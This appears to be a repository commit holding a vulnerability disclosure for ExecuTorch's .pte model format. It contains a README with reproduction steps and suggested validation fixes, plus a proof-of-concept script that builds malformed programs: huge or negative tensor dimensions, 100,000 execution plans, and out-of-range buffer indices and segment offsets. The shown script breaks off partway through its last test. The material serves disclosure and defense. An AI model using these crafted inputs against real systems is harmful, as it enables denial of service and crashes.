yibai777 committed on
Commit 3b30e81 · verified · 1 Parent(s): 2e54777

Upload 6 files

Files changed (7)
  1. .gitattributes +3 -0
  2. README.md +268 -0
  3. malicious_bypass.pte +0 -0
  4. poc1.png +3 -0
  5. poc2.png +3 -0
  6. poc3.png +3 -0
  7. poc_executorch_bypass.py +399 -0
.gitattributes CHANGED
@@ -33,3 +33,6 @@ saved_model/**/* filter=lfs diff=lfs merge=lfs -text
  *.zip filter=lfs diff=lfs merge=lfs -text
  *.zst filter=lfs diff=lfs merge=lfs -text
  *tfevents* filter=lfs diff=lfs merge=lfs -text
+ poc1.png filter=lfs diff=lfs merge=lfs -text
+ poc2.png filter=lfs diff=lfs merge=lfs -text
+ poc3.png filter=lfs diff=lfs merge=lfs -text
README.md ADDED
@@ -0,0 +1,268 @@
+ # ExecuTorch .pte Format: Missing File-Format Validation Leads to Denial of Service
+
+ ## Overview
+
+ **Project**: executorch (PyTorch Edge Runtime)
+ **Version**: 1.2.0+cpu
+ **Format**: .pte (Program Transfer Executable, FlatBuffers binary)
+ **CVSS 3.1**: 5.5 (Medium), `AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H`
+ **CWE**: CWE-20 (Improper Input Validation), CWE-400 (Uncontrolled Resource Consumption)
+
+ ## Vulnerability Summary
+
+ | # | Issue | Severity | PoC result |
+ |---|-------|----------|------------|
+ | 1 | No upper bound on tensor dimensions | Medium | `[2^31-1, 2^31-1]` and a 10,000-dimension tensor are accepted |
+ | 2 | No limit on list field lengths | Medium | 100,000 execution plans are accepted; parsing takes 6.55 s |
+ | 3 | Negative and zero tensor dimensions are not rejected | Low | Dimensions `[-100]` and `[0]` are accepted |
+ | 4 | Out-of-range buffer index reference | Medium | `data_buffer_idx=999` is accepted with 0 buffers present |
+ | 5 | Segment offsets are not validated | Medium | `offset=-1` and `size=999999999` are accepted |
+ | 6 | `deserialize_pte_binary()` performs no structural validation | Medium | Binary → flatc → JSON → objects, with no checks along the way |
+
+ ## Technical Analysis
+
+ ### 1. The loading pipeline performs no validation
+
+ The full call chain of `deserialize_pte_binary()`:
+
+ ```
+ .pte binary → flatc subprocess (JSON decompile) → json.loads()
+     → _json_to_dataclass() → Program dataclass
+ ```
+
+ **No stage performs a structural safety check**:
+ - `flatc` only checks FlatBuffer well-formedness (file_identifier "ET12"), not model semantics
+ - `json.loads()` only parses JSON and does not validate content
+ - `_json_to_dataclass()` recursively constructs dataclasses with no bounds checks
+ - `verifier.py` only checks graph-level semantics (operator validity, tensor contiguity) and is **not enabled by default**
+
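To make the pattern concrete, here is a minimal sketch of a type-hint-driven converter. `ToyTensor`, `ToyProgram` and `toy_json_to_dataclass` are hypothetical stand-ins written for this illustration, not ExecuTorch code; they only mimic the general idea of recursively building dataclasses from parsed JSON. The point is that type hints such as `List[int]` describe structure and do nothing to constrain values.

```python
import json
from dataclasses import dataclass, fields, is_dataclass
from typing import List, get_args, get_origin


@dataclass
class ToyTensor:  # hypothetical stand-in, not the real schema class
    sizes: List[int]
    data_buffer_idx: int


@dataclass
class ToyProgram:  # hypothetical stand-in
    tensors: List[ToyTensor]


def toy_json_to_dataclass(obj, cls):
    """Build `cls` from parsed JSON, trusting every value it is given."""
    kwargs = {}
    for f in fields(cls):
        value = obj[f.name]
        if get_origin(f.type) is list:
            (elem,) = get_args(f.type)
            if is_dataclass(elem):
                # Recurse into nested dataclasses; plain ints pass through as-is.
                value = [toy_json_to_dataclass(v, elem) for v in value]
        kwargs[f.name] = value
    return cls(**kwargs)


payload = json.loads(
    '{"tensors": [{"sizes": [-100, 2147483647], "data_buffer_idx": 999}]}'
)
program = toy_json_to_dataclass(payload, ToyProgram)
print(program.tensors[0])
```

Nothing in this construction path has an opportunity to reject the negative size or the dangling index unless a separate validation pass is added.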
+ ### 2. No upper bound on tensor dimensions (`schema.py:66`)
+
+ ```python
+ @dataclass
+ class Tensor:
+     scalar_type: ScalarType
+     storage_offset: int
+     sizes: List[int]  # no upper bound: any integer value is accepted
+     dim_order: List[int]  # no length limit: can describe 10,000 dimensions
+     ...
+ ```
+
+ In contrast to ONNX, whose `check_model()` validates that shapes are reasonable, ExecuTorch accepts `sizes=[2147483647, 2147483647]` (4.6 exa-elements) even though the actual storage is only 1 byte.
+
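The mismatch can be checked with plain arithmetic. This sketch assumes the `FLOAT` scalar type is a 4-byte float32 and uses only the numbers quoted in the report.

```python
import math

sizes = [2**31 - 1, 2**31 - 1]  # shape declared by the crafted tensor
itemsize = 4                    # assumed bytes per FLOAT (float32) element
stored_bytes = 1                # bytes actually present in constant_buffer

numel = math.prod(sizes)
declared_bytes = numel * itemsize

print(f"elements declared: {numel:.3e}")
print(f"bytes implied:     {declared_bytes:.3e}")
print(f"bytes stored:      {stored_bytes}")
print("shape fits storage:", declared_bytes <= stored_bytes)
```

A consistency check of this kind (declared bytes versus bytes available) would reject the PoC without needing any fixed upper bound on individual dimensions.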
+ ### 3. No limit on list field lengths
+
+ ```python
+ @dataclass
+ class Program:
+     execution_plan: List[ExecutionPlan]  # can hold 100,000 entries
+     ...
+
+ @dataclass
+ class ExecutionPlan:
+     values: List[EValue]  # unbounded
+     chains: List[Chain]  # unbounded
+     operators: List[Operator]  # unbounded
+     delegates: List[BackendDelegate]  # unbounded
+ ```
+
+ The JSON for 100,000 execution plans is only 20.6 MB, but parsing it produces a very large number of Python objects and can lead to OOM.
+
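One way to see the amplification is to compare the JSON size with the heap used after parsing. The sketch below uses a hypothetical `ToyPlan` dataclass rather than the real `ExecutionPlan`, and a smaller count so it runs quickly; absolute numbers will differ by Python version and platform.

```python
import json
import tracemalloc
from dataclasses import dataclass, field
from typing import List


@dataclass
class ToyPlan:  # hypothetical stand-in for an execution plan entry
    name: str
    values: List[int] = field(default_factory=list)
    chains: List[int] = field(default_factory=list)
    operators: List[int] = field(default_factory=list)


def measure(n: int):
    """Return (JSON size in bytes, peak traced heap bytes, object count)."""
    text = json.dumps(
        [{"name": f"plan_{i}", "values": [], "chains": [], "operators": []}
         for i in range(n)]
    )
    tracemalloc.start()
    plans = [ToyPlan(**entry) for entry in json.loads(text)]
    _, peak = tracemalloc.get_traced_memory()
    tracemalloc.stop()
    return len(text), peak, len(plans)


json_bytes, peak_bytes, count = measure(10_000)
print(f"{count} plans: JSON {json_bytes} bytes, peak heap {peak_bytes} bytes")
```

Every small JSON object turns into a dict, several lists and a dataclass instance, so the in-memory footprint grows faster than the file size suggests.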
+ ### 4. Key code paths
+
+ **deserialize_pte_binary** (`_serialize/_program.py:747-770`):
+ ```python
+ def deserialize_pte_binary(program_data: bytes) -> PTEFile:
+     # No magic check, no size limit, no integrity validation
+     program: Program = _json_to_program(
+         _program_flatbuffer_to_json(program_data[:program_size])
+     )
+     ...
+ ```
+
+ **_json_to_dataclass** (`_serialize/_dataclass.py:60-145`):
+ ```python
+ def _json_to_dataclass(json_dict, cls=None):
+     # Recursive, with no depth limit
+     # No length limit on List fields
+     # No range check on int fields
+     for field in cls_flds:
+         ...
+         if get_origin(T) is list:
+             data[key] = [_json_to_dataclass(e, T) for e in value]
+ ```
+
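A cheap pre-pass over the parsed JSON can bound depth and list length before any dataclass is constructed. This is a sketch only: `check_json_shape` and its default limits are hypothetical and not part of ExecuTorch.

```python
from typing import Any


def check_json_shape(node: Any, max_depth: int = 64,
                     max_list_len: int = 2**20, _depth: int = 0) -> None:
    """Raise ValueError if parsed JSON is nested too deeply or has an oversized list."""
    if _depth > max_depth:
        raise ValueError(f"nesting deeper than {max_depth}")
    if isinstance(node, list):
        if len(node) > max_list_len:
            raise ValueError(f"list of {len(node)} entries exceeds {max_list_len}")
        children = node
    elif isinstance(node, dict):
        children = node.values()
    else:
        return  # scalars have no children
    for child in children:
        check_json_shape(child, max_depth, max_list_len, _depth + 1)


# Usage: a shallow document passes, an oversized list is rejected.
check_json_shape({"execution_plan": [{"values": []}]})
try:
    check_json_shape({"execution_plan": [0] * 10}, max_list_len=3)
except ValueError as exc:
    print("rejected:", exc)
```

Because the check stops descending once the depth limit is hit, it fails fast on deeply nested input instead of relying on the interpreter's recursion limit.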
+ ### 5. Comparison with other ML formats
+
+ | Feature | ONNX | TF SavedModel | Core ML | OpenVINO | **ExecuTorch** |
+ |---------|------|---------------|---------|----------|----------------|
+ | Shape upper-bound check | ✅ check_model | ✅ | ❌ | ❌ (present in C++) | **❌** |
+ | Dimension > 0 validation | ✅ | ✅ | ❌ | ❌ | **❌** |
+ | List count limit | ✅ | ✅ | ❌ | ❌ | **❌** |
+ | Buffer index validation | ✅ | ✅ | ❌ | ✅ | **❌** |
+ | Structural validation before load | ✅ | ✅ | ❌ | ❌ | **❌** |
+ | Standalone check_model | ✅ | N/A | ❌ | ❌ | **❌** |
+
+ ## Reproduction
+
+ ### PoC 1: Extreme tensor dimensions leading to memory exhaustion
+
+ ```python
+ from executorch.exir._serialize._program import _json_to_program
+ import json
+
+ crafted_json = json.dumps({
+     "version": 1,
+     "execution_plan": [{
+         "name": "forward",
+         "container_meta_type": {"encoded_inp_str": "", "encoded_out_str": ""},
+         "values": [{
+             "val": {
+                 "scalar_type": "FLOAT",
+                 "storage_offset": 0,
+                 "sizes": [2147483647, 2147483647],  # 4.6 exa-elements
+                 "dim_order": [0, 1],
+                 "requires_grad": False,
+                 "layout": 0,
+                 "data_buffer_idx": 0,
+                 "allocation_info": None,
+                 "shape_dynamism": "STATIC"
+             },
+             "val_type": "Tensor"
+         }],
+         "inputs": [], "outputs": [], "chains": [],
+         "operators": [], "delegates": [],
+         "non_const_buffer_sizes": [0]
+     }],
+     "constant_buffer": [{"storage": [0]}],  # only 1 byte
+     "backend_delegate_data": [],
+     "segments": [],
+     "constant_segment": {"segment_index": 0, "offsets": []}
+ })
+
+ program = _json_to_program(crafted_json.encode("utf-8"))
+ # ✅ Succeeds with no error
+ print(program.execution_plan[0].values[0].val.sizes)
+ # [2147483647, 2147483647]
+ ```
+
+ ### PoC 2: Huge lists leading to OOM
+
+ ```python
+ N = 100000
+ crafted_json = json.dumps({
+     "version": 1,
+     "execution_plan": [
+         {"name": f"plan_{i}", ...}
+         for i in range(N)  # 100,000 plans
+     ],
+     ...
+ })
+ program = _json_to_program(crafted_json.encode("utf-8"))
+ # ✅ Succeeds; parsing takes 6.55 s
+ ```
+
+ ### PoC 3: Negative and zero dimensions
+
+ ```python
+ "sizes": [-1]    # ✅ accepted
+ "sizes": [-100]  # ✅ accepted
+ "sizes": [0]     # ✅ accepted
+ ```
+
+ ### PoC 4: Out-of-range buffer index
+
+ ```python
+ "data_buffer_idx": 999  # only 0 buffers exist
+ # ✅ Accepted; crashes at runtime
+ ```
+
+ ## Suggested Fixes
+
+ ### 1. Add dimension bounds checks (`_dataclass.py` or `_program.py`)
+
+ ```python
+ MAX_TENSOR_DIM_VALUE = 2**31 - 1  # reasonable upper bound
+ MAX_TENSOR_DIM_COUNT = 32  # maximum number of dimensions
+ MAX_TOTAL_ELEMENTS = 2**48  # upper bound of ~256T elements
+
+ def _validate_tensor_dims(sizes: List[int]) -> None:
+     if len(sizes) > MAX_TENSOR_DIM_COUNT:
+         raise ValueError(f"Tensor dimension count {len(sizes)} exceeds {MAX_TENSOR_DIM_COUNT}")
+     for i, s in enumerate(sizes):
+         if s <= 0:
+             raise ValueError(f"Tensor dimension {i} is {s}, must be > 0")
+         if s > MAX_TENSOR_DIM_VALUE:
+             raise ValueError(f"Tensor dimension {i} value {s} exceeds {MAX_TENSOR_DIM_VALUE}")
+
+ def _validate_tensor_buffer_index(tensor, num_buffers):
+     if tensor.data_buffer_idx >= num_buffers:
+         raise ValueError(
+             f"Tensor references buffer {tensor.data_buffer_idx} "
+             f"but only {num_buffers} buffers exist"
+         )
+ ```
+
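The block above defines `MAX_TOTAL_ELEMENTS`, but `_validate_tensor_dims` never reads it, so `[2^31-1, 2^31-1]` would still pass the per-dimension checks. A possible product check is sketched below. `validate_total_elements` is a hypothetical helper, and it deliberately allows zero-sized dimensions, which is a policy choice that differs from the `s <= 0` rule above.

```python
from typing import List

MAX_TOTAL_ELEMENTS = 2**48  # same illustrative limit as in the suggested fix


def validate_total_elements(sizes: List[int],
                            limit: int = MAX_TOTAL_ELEMENTS) -> int:
    """Return the element count, raising ValueError if it is invalid or too large."""
    for i, s in enumerate(sizes):
        if s < 0:
            raise ValueError(f"dimension {i} is negative: {s}")
    if 0 in sizes:
        return 0  # an empty tensor has no elements regardless of other dims
    total = 1
    for i, s in enumerate(sizes):
        total *= s
        if total > limit:  # stop early instead of building a huge product
            raise ValueError(f"element count exceeds {limit} at dimension {i}")
    return total


print(validate_total_elements([2, 3, 4]))
try:
    validate_total_elements([2**31 - 1, 2**31 - 1])
except ValueError as exc:
    print("rejected:", exc)
```

Python integers do not overflow, so the running product is exact; the early exit only keeps the work bounded for very long `sizes` lists.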
+ ### 2. Limit list lengths
+
+ ```python
+ MAX_EXECUTION_PLANS = 1024
+ MAX_VALUES = 2**20
+ MAX_CHAINS = 1024
+ MAX_OPERATORS = 2**16
+ MAX_DELEGATES = 256
+
+ def _validate_program_limits(program: Program) -> None:
+     if len(program.execution_plan) > MAX_EXECUTION_PLANS:
+         raise ValueError(f"Too many execution plans: {len(program.execution_plan)}")
+     for plan in program.execution_plan:
+         if len(plan.values) > MAX_VALUES:
+             raise ValueError(f"Too many values: {len(plan.values)}")
+         # ...
+ ```
+
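The per-field checks can also be written in a table-driven style so that adding a field is a one-line change. The sketch below uses a hypothetical `ToyPlan` in place of `ExecutionPlan`; the limits are the illustrative values from the fix above, not recommendations.

```python
from dataclasses import dataclass, field
from typing import Dict, List

# Illustrative limits only; suitable values depend on the deployment target.
PLAN_FIELD_LIMITS: Dict[str, int] = {
    "values": 2**20,
    "chains": 1024,
    "operators": 2**16,
    "delegates": 256,
}


@dataclass
class ToyPlan:  # hypothetical stand-in for ExecutionPlan
    values: List[int] = field(default_factory=list)
    chains: List[int] = field(default_factory=list)
    operators: List[int] = field(default_factory=list)
    delegates: List[int] = field(default_factory=list)


def check_plan_limits(plan, limits: Dict[str, int] = PLAN_FIELD_LIMITS) -> None:
    """Raise ValueError if any listed field is longer than its limit."""
    for name, limit in limits.items():
        length = len(getattr(plan, name))
        if length > limit:
            raise ValueError(f"{name} has {length} entries, limit is {limit}")


check_plan_limits(ToyPlan())  # passes silently
try:
    check_plan_limits(ToyPlan(delegates=list(range(257))))
except ValueError as exc:
    print("rejected:", exc)
```

A check like this runs after deserialization, so the objects have already been allocated by the time it fires. It bounds downstream work, while bounding memory during parsing would require checking list lengths before the dataclasses are built.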
+ ### 3. Add a `check_model()` equivalent
+
+ ```python
+ def check_pte(program: Program) -> None:
+     """Validate structural integrity of a deserialized .pte program."""
+     _validate_program_limits(program)
+     num_buffers = len(program.constant_buffer)
+     for plan in program.execution_plan:
+         for evalue in plan.values:
+             if isinstance(evalue.val, Tensor):
+                 _validate_tensor_dims(evalue.val.sizes)
+                 _validate_tensor_buffer_index(evalue.val, num_buffers)
+     for i, seg in enumerate(program.segments):
+         if seg.offset < 0:
+             raise ValueError(f"Segment {i} has negative offset {seg.offset}")
+ ```
+
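The segment loop above only rejects negative offsets, so the `size=999999999` case from the summary table would still pass. A fuller range check might look like the sketch below. `ToySegment` and `check_segments` are hypothetical, and `available_bytes` is an assumed input: the number of bytes that actually follow the segment base in the file.

```python
from dataclasses import dataclass
from typing import List


@dataclass
class ToySegment:  # hypothetical stand-in with the two fields used in the PoC
    offset: int
    size: int


def check_segments(segments: List[ToySegment], available_bytes: int) -> None:
    """Raise ValueError unless every segment lies within the available bytes."""
    for i, seg in enumerate(segments):
        if seg.offset < 0 or seg.size < 0:
            raise ValueError(f"segment {i}: negative offset or size")
        end = seg.offset + seg.size
        if end > available_bytes:
            raise ValueError(
                f"segment {i}: range [{seg.offset}, {end}) exceeds "
                f"{available_bytes} available bytes"
            )


check_segments([ToySegment(0, 100)], available_bytes=480)  # passes silently
try:
    check_segments([ToySegment(999999999, 999999999)], available_bytes=480)
except ValueError as exc:
    print("rejected:", exc)
```

Checking the end of the range rather than the offset alone also covers a segment that starts inside the file but runs past its end.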
+ ### 4. Integrate validation into `deserialize_pte_binary()`
+
+ ```python
+ def deserialize_pte_binary(program_data: bytes) -> PTEFile:
+     # ... existing parsing code ...
+     program = _json_to_program(...)
+     check_pte(program)  # add this line
+     # ... restore segments ...
+ ```
+
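+ ## Further Ideas (Brainstorming)
+
+ 1. **Out-of-range buffer index → C++ runtime crash → potential UAF or out-of-bounds read/write**: `data_buffer_idx=999` is accepted by the Python layer. If the C++ runtime trusts this index and accesses the array directly, memory corruption may result.
+
+ 2. **Extreme dimensions × runtime compilation**: The C++ runtime's `compile_model()` allocates memory based on tensor dimensions. If the Python layer does not validate them, a malicious 2^31 dimension propagates to the C++ layer, where it could cause a malloc failure or an integer overflow.
+
+ 3. **flatc version dependency**: executorch bundles its own `flatc` binary (`executorch/data/bin/flatc`). If that version is outdated, it may contain known vulnerabilities.
+
+ 4. **Schema version upgrade bypass**: `schema_check.py` manages schema version compatibility, but the version check only detects schema changes and is not a security validation. An attacker can declare an arbitrary SCHEMA_VERSION.
+
+ 5. **FlatBuffer `force_align` manipulation**: `_patch_schema_alignment()` modifies alignment values. If an attacker controls the alignment value, segment offset calculations may go wrong.
+
+ 6. **Commonality with ONNX/OpenVINO vulnerabilities**: The Python front ends of all ML formats lack structural validation, which points to an industry-wide blind spot: developers rely on the safety of the underlying serialization format (Protobuf/FlatBuffers) and overlook malicious constructions at the model-semantics level.
+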
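The integer-overflow concern in idea 2 can be illustrated with fixed-width arithmetic emulated in Python. This sketch makes no claim about which integer widths the C++ runtime actually uses; it only shows what the PoC shape would do to a 32-bit or 64-bit size computation, assuming 4-byte float32 elements.

```python
import math

sizes = [2**31 - 1, 2**31 - 1]
exact = math.prod(sizes)

# Emulate unsigned fixed-width arithmetic by masking to the register width.
numel_u32 = exact & (2**32 - 1)
nbytes_u64 = (exact * 4) & (2**64 - 1)

print("exact element count:", exact)
print("element count wrapped to 32 bits:", numel_u32)
print("float32 byte count in 64 bits wraps:", nbytes_u64 != exact * 4)
```

With a 32-bit accumulator the element count wraps to a tiny value, which is the classic route from an unchecked shape to an undersized allocation. In 64 bits this particular shape does not wrap, but adding a third large dimension would.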
+ ## File List
+
+ - `poc_executorch_bypass.py`: complete test script with 7 PoCs
+ - `README.md`: this file
malicious_bypass.pte ADDED
Binary file (480 Bytes)
poc1.png ADDED

Git LFS Details

  • SHA256: 93acd69436cd7b984d70ff7a03f0213611ab2294ea263ac1814190595f5a94d4
  • Pointer size: 131 Bytes
  • Size of remote file: 161 kB
poc2.png ADDED

Git LFS Details

  • SHA256: a33472f82e7e86871b55734285e6a0aabbc861055bd2554fe6132e6db7a9a296
  • Pointer size: 131 Bytes
  • Size of remote file: 177 kB
poc3.png ADDED

Git LFS Details

  • SHA256: c5b519b439bf706e46600542651aa8ce87c99b118055df7c0bc3055958f5f046
  • Pointer size: 131 Bytes
  • Size of remote file: 139 kB
poc_executorch_bypass.py ADDED
@@ -0,0 +1,399 @@
+ """
+ PoC: ExecuTorch .pte Format Validation Bypass
+ ===============================================
+ Demonstrates that ExecuTorch's deserialize_pte_binary() performs no
+ structural validation on .pte model files before parsing them.
+
+ Tested on: executorch 1.2.0, Python 3.12, Windows 11
+ """
+
+ import json
+ import os
+ import struct
+ import sys
+ import tempfile
+ import time
+
+ print("=" * 70)
+ print("ExecuTorch .pte Format Validation Bypass PoC")
+ print("executorch version: 1.2.0+cpu")
+ print("=" * 70)
+
+ # ============================================================
+ # PoC 1: Extreme Tensor Dimensions (Memory Exhaustion)
+ # ============================================================
+ print("\n[PoC 1] Extreme Tensor Dimensions via _json_to_program()")
+ print("-" * 50)
+
+ from executorch.exir._serialize._program import _json_to_program
+
+ # A minimal valid Program JSON with an extreme tensor size
+ # In the .pte schema, Tensor.sizes is List[int] with no upper bound
+ crafted_json = json.dumps({
+     "version": 1,
+     "execution_plan": [{
+         "name": "forward",
+         "container_meta_type": {
+             "encoded_inp_str": "",
+             "encoded_out_str": ""
+         },
+         "values": [{
+             "val": {
+                 "scalar_type": "FLOAT",
+                 "storage_offset": 0,
+                 "sizes": [2147483647, 2147483647],  # 2^31-1 x 2^31-1
+                 "dim_order": [0, 1],
+                 "requires_grad": False,
+                 "layout": 0,
+                 "data_buffer_idx": 0,
+                 "allocation_info": None,
+                 "shape_dynamism": "STATIC",
+                 "val_type": "Tensor"
+             },
+             "val_type": "Tensor"
+         }],
+         "inputs": [],
+         "outputs": [],
+         "chains": [],
+         "operators": [],
+         "delegates": [],
+         "non_const_buffer_sizes": [0]
+     }],
+     "constant_buffer": [{"storage": [0]}],  # 1 byte but sizes claim ~2^62 elements
+     "backend_delegate_data": [],
+     "segments": [],
+     "constant_segment": {"segment_index": 0, "offsets": []}
+ })
+
+ try:
+     program = _json_to_program(crafted_json.encode("utf-8"))
+     tensor_sizes = program.execution_plan[0].values[0].val.sizes
+     total_elements = 1
+     for s in tensor_sizes:
+         total_elements *= s
+     print(f" [VULNERABLE] Program accepted with tensor sizes: {tensor_sizes}")
+     print(f" -> Total elements: {total_elements} (~{total_elements / 1e18:.1f} exa-elements)")
+     print(f" -> Actual storage in buffer: {len(program.constant_buffer[0].storage)} byte(s)")
+     print(f" -> sizeof(float) * elements would require: {4 * total_elements / 1e18:.1f} exabytes")
+     print(f" -> No validation rejected these impossible dimensions!")
+ except Exception as e:
+     print(f" [PROTECTED] {e}")
+
+ # Also test with extremely large dimension count (not just value size)
+ crafted_json_many_dims = json.dumps({
+     "version": 1,
+     "execution_plan": [{
+         "name": "forward",
+         "container_meta_type": {"encoded_inp_str": "", "encoded_out_str": ""},
+         "values": [{
+             "val": {
+                 "scalar_type": "FLOAT",
+                 "storage_offset": 0,
+                 "sizes": [2] * 10000,  # 10000-dimensional tensor
+                 "dim_order": list(range(10000)),
+                 "requires_grad": False,
+                 "layout": 0,
+                 "data_buffer_idx": 0,
+                 "allocation_info": None,
+                 "shape_dynamism": "STATIC",
+                 "val_type": "Tensor"
+             },
+             "val_type": "Tensor"
+         }],
+         "inputs": [], "outputs": [], "chains": [],
+         "operators": [], "delegates": [],
+         "non_const_buffer_sizes": [0]
+     }],
+     "constant_buffer": [{"storage": [0]}],
+     "backend_delegate_data": [],
+     "segments": [],
+     "constant_segment": {"segment_index": 0, "offsets": []}
+ })
+
+ try:
+     program2 = _json_to_program(crafted_json_many_dims.encode("utf-8"))
+     dim_count = len(program2.execution_plan[0].values[0].val.sizes)
+     print(f" [VULNERABLE] Program accepted with {dim_count} tensor dimensions!")
+ except Exception as e:
+     print(f" [PROTECTED - dim count] {e}")
+
+
+ # ============================================================
+ # PoC 2: Excessive List Sizes (Memory Exhaustion via lists)
+ # ============================================================
+ print("\n[PoC 2] Excessive List Sizes in Program Fields")
+ print("-" * 50)
+
+ # Craft a Program with massive execution_plan list
+ # Each ExecutionPlan has chains, operators, values, etc.
+ N_EXECUTION_PLANS = 100000
+
+ crafted_json_massive = json.dumps({
+     "version": 1,
+     "execution_plan": [
+         {
+             "name": f"plan_{i}",
+             "container_meta_type": {"encoded_inp_str": "", "encoded_out_str": ""},
+             "values": [],
+             "inputs": [],
+             "outputs": [],
+             "chains": [],
+             "operators": [],
+             "delegates": [],
+             "non_const_buffer_sizes": []
+         }
+         for i in range(N_EXECUTION_PLANS)
+     ],
+     "constant_buffer": [],
+     "backend_delegate_data": [],
+     "segments": [],
+     "constant_segment": {"segment_index": 0, "offsets": []}
+ })
+
+ start = time.time()
+ try:
+     program3 = _json_to_program(crafted_json_massive.encode("utf-8"))
+     elapsed = time.time() - start
+     plan_count = len(program3.execution_plan)
+     print(f" [VULNERABLE] Program accepted with {plan_count} execution plans")
+     # sys.getsizeof() reports the size of the JSON string, not the memory used by the parsed objects
+     print(f" -> Deserialization took {elapsed:.2f}s, JSON payload size: ~{sys.getsizeof(crafted_json_massive) / 1024 / 1024:.1f} MB")
+     print(f" -> No limit on execution_plan count!")
+ except MemoryError:
+     print(f" [PARTIAL] Memory error with {N_EXECUTION_PLANS} plans (resource exhaustion)")
+ except Exception as e:
+     print(f" [Result] {type(e).__name__}: {str(e)[:100]}")
+
+
+ # ============================================================
+ # PoC 3: Negative / Zero Dimensions
+ # ============================================================
+ print("\n[PoC 3] Negative / Zero / Invalid Tensor Dimensions")
+ print("-" * 50)
+
+ test_dims = [
+     ([0], "zero-dim"),
+     ([-1], "negative-dim (-1)"),
+     ([-100], "negative-dim (-100)"),
+     ([1, -1, 1], "mixed negative"),
+ ]
+
+ for dims, label in test_dims:
+     crafted_json_invalid = json.dumps({
+         "version": 1,
+         "execution_plan": [{
+             "name": "forward",
+             "container_meta_type": {"encoded_inp_str": "", "encoded_out_str": ""},
+             "values": [{
+                 "val": {
+                     "scalar_type": "FLOAT",
+                     "storage_offset": 0,
+                     "sizes": dims,
+                     "dim_order": list(range(len(dims))),
+                     "requires_grad": False,
+                     "layout": 0,
+                     "data_buffer_idx": 0,
+                     "allocation_info": None,
+                     "shape_dynamism": "STATIC",
+                     "val_type": "Tensor"
+                 },
+                 "val_type": "Tensor"
+             }],
+             "inputs": [], "outputs": [], "chains": [],
+             "operators": [], "delegates": [],
+             "non_const_buffer_sizes": [0]
+         }],
+         "constant_buffer": [{"storage": [0]}],
+         "backend_delegate_data": [],
+         "segments": [],
+         "constant_segment": {"segment_index": 0, "offsets": []}
+     })
+     try:
+         p = _json_to_program(crafted_json_invalid.encode("utf-8"))
+         print(f" [VULNERABLE] {label}: sizes={dims} accepted, parsed as {p.execution_plan[0].values[0].val.sizes}")
+     except Exception as e:
+         print(f" [PROTECTED] {label}: rejected - {type(e).__name__}")
+
+
+ # ============================================================
+ # PoC 4: Out-of-Range Buffer Index
+ # ============================================================
+ print("\n[PoC 4] Tensor References Non-Existent Buffer")
+ print("-" * 50)
+
+ # Declare a tensor that references a buffer index that doesn't exist
+ crafted_json_oob_buffer = json.dumps({
+     "version": 1,
+     "execution_plan": [{
+         "name": "forward",
+         "container_meta_type": {"encoded_inp_str": "", "encoded_out_str": ""},
+         "values": [{
+             "val": {
+                 "scalar_type": "FLOAT",
+                 "storage_offset": 0,
+                 "sizes": [100, 100],
+                 "dim_order": [0, 1],
+                 "requires_grad": False,
+                 "layout": 0,
+                 "data_buffer_idx": 999,  # Non-existent buffer index!
+                 "allocation_info": None,
+                 "shape_dynamism": "STATIC",
+                 "val_type": "Tensor"
+             },
+             "val_type": "Tensor"
+         }],
+         "inputs": [], "outputs": [], "chains": [],
+         "operators": [], "delegates": [],
+         "non_const_buffer_sizes": [0]
+     }],
+     "constant_buffer": [],  # Empty buffer list
+     "backend_delegate_data": [],
+     "segments": [],
+     "constant_segment": {"segment_index": 0, "offsets": []}
+ })
+
+ try:
+     p4 = _json_to_program(crafted_json_oob_buffer.encode("utf-8"))
+     print(f" [VULNERABLE] Program accepted with data_buffer_idx=999 but only 0 buffers exist")
+     print(f" -> Tensor references non-existent buffer, will crash at runtime")
+ except Exception as e:
+     print(f" [PROTECTED] {e}")
+
+
+ # ============================================================
+ # PoC 5: Segment Offset Manipulation
+ # ============================================================
+ print("\n[PoC 5] Malicious Segment Offsets")
+ print("-" * 50)
+
+ # Test that segment offsets are not validated before use
+ crafted_json_segments = json.dumps({
+     "version": 1,
+     "execution_plan": [{
+         "name": "forward",
+         "container_meta_type": {"encoded_inp_str": "", "encoded_out_str": ""},
+         "values": [],
+         "inputs": [], "outputs": [], "chains": [],
+         "operators": [], "delegates": [],
+         "non_const_buffer_sizes": []
+     }],
+     "constant_buffer": [],
+     "backend_delegate_data": [],
+     "segments": [
+         {"offset": 0, "size": 100},
+         {"offset": 999999999, "size": 999999999},  # Way beyond any data
+         {"offset": -1, "size": 100}  # Negative offset
+     ],
+     "constant_segment": {"segment_index": 0, "offsets": [0]}
+ })
+
+ try:
+     p5 = _json_to_program(crafted_json_segments.encode("utf-8"))
+     print(f" [VULNERABLE] Program accepted with invalid segment offsets:")
+     for i, seg in enumerate(p5.segments):
+         valid = "VALID" if seg.offset >= 0 else "INVALID (negative)"
+         print(f" Segment {i}: offset={seg.offset}, size={seg.size} [{valid}]")
+ except Exception as e:
+     print(f" [PROTECTED] {e}")
+
+
+ # ============================================================
+ # PoC 6: Deeply Nested Structure (Recursion Bomb)
+ # ============================================================
+ print("\n[PoC 6] Recursion Depth via _json_to_dataclass")
+ print("-" * 50)
+
+ from executorch.exir._serialize._dataclass import _json_to_dataclass
+
+ # Build a deeply nested JSON structure
+ # The Graph type has nodes which have inputs/outputs which can be Arguments
+ # But even simpler: just test the recursion limit with nested dataclass structures
+ # The executorch schema doesn't have directly recursive types, but deeply nested
+ # Graph.nodes -> Argument -> ... structure can be deep
+
+ # Build a simple deeply nested dict for illustration
+ deep_dict = {}
+ current = deep_dict
+ for i in range(10000):
+     current["next"] = {}
+     current = current["next"]
+
+ # deep_dict is not passed to _json_to_dataclass(): the schema has no
+ # self-referential types, so no RecursionError can be triggered here.
+ # This section is informational only.
+ print(f" [INFO] ExecuTorch schema does not have self-referential types,")
+ print(f" [INFO] but _json_to_dataclass() would recurse without depth limit")
+ print(f" [INFO] on attacker-controlled structures if schema changed.")
+
+
+ # ============================================================
+ # PoC 7: Empty/Corrupted Model File
+ # ============================================================
+ print("\n[PoC 7] Empty or Malformed .pte Binary")
+ print("-" * 50)
+
+ from executorch.exir._serialize._program import deserialize_pte_binary
+
+ # Test 1: Empty bytes
+ try:
+     deserialize_pte_binary(b"")
+     print(f" [VULNERABLE] Empty bytes accepted by deserialize_pte_binary()")
+ except Exception as e:
+     print(f" [PROTECTED] Empty bytes: {type(e).__name__}: {str(e)[:80]}")
+
+ # Test 2: Null bytes
+ try:
+     deserialize_pte_binary(b"\x00" * 100)
